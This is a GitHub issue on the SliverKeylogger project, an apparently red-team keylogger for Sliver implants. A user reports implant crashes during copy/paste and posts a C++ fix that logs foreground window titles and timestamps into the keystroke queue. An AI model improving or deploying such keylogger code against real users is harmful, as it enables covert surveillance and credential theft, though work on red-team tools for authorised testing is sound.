SliverKeylogger icon indicating copy to clipboard operation
SliverKeylogger copied to clipboard
verified publisher icon trustedsec

Random crash of the implant when copy/pasting

Open smeukinou opened this issue 2 years ago • 0 comments

I found out that the keylogger crashed sliver implants, randomly, but quite quickly (after a few minutes under normal usage) when some copy/paste operations where carried out.

I cannot explain why it crashes, but I found out it's during the only conversion from string to wstring, and for some reason, in some cases, it crashes.

Here is the fixed code in WinMsgHandler.cpp (basicallhy use wide versions of api, to avoid the offending string=>wstring conversoion) : void WinMsgHandler::checkFocus(UINT keyChar) { WCHAR window_title[256] = L""; WCHAR wt[300] = L""; SYSTEMTIME curr_time; GetLocalTime(&curr_time);

auto hActiveWindow = GetForegroundWindow();
GetWindowTextW(hActiveWindow, window_title, 256);

//Insert reference to the current window
if ((hActiveWindow != hPrevWind)) {

	swprintf(wt, 300, L"\r\n%hu-%hu-%hu %hu:%hu [ %s ]\r\n", curr_time.wYear, curr_time.wMonth,
		curr_time.wDay, curr_time.wHour, curr_time.wMinute, window_title);

	_queue->Push(std::wstring(wt));
	hPrevWind = hActiveWindow;
}

}

smeukinou avatar Apr 14 '23 07:04 smeukinou